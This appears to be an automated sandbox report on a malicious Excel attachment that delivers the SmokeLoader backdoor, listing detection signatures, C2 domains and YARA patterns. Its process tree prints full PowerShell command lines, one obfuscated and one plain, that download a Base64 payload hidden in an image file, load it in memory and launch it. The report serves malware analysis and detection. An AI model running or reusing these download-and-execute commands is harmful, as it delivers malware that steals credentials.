Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
40830001.xls

Overview

General Information

Sample name:40830001.xls
renamed because original name is a hash value
Original sample name: TO _SC13060P-CS_19 6 PO()POTWN#P20240830001.xls
Analysis ID:1502223
MD5:a230c030160d04f7fa28fa4d48d71584
SHA1:802288792e4b687e1f7f9cfb48086bc28e0152e3
SHA256:cb92d320fc9bc674e8d37ceeebf0363f8e96dd67ef4ef543b3348f96ef567e5f
Tags:xls
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3416 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3692 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3996 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 4052 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 2984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 1976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 2852 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3244 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3340 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 1256 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3164 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 3216 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
              • explorer.exe (PID: 3348 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
              • explorer.exe (PID: 2236 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • taskeng.exe (PID: 424 cmdline: taskeng.exe {4EEBF1C0-00CF-4920-A83B-C678B0B7FDEB} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • dagifhd (PID: 1216 cmdline: C:\Users\user\AppData\Roaming\dagifhd MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1479:$obj2: \objdata
  • 0x1461:$obj3: \objupdate
  • 0x143d:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1479:$obj2: \objdata
  • 0x1461:$obj3: \objupdate
  • 0x143d:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
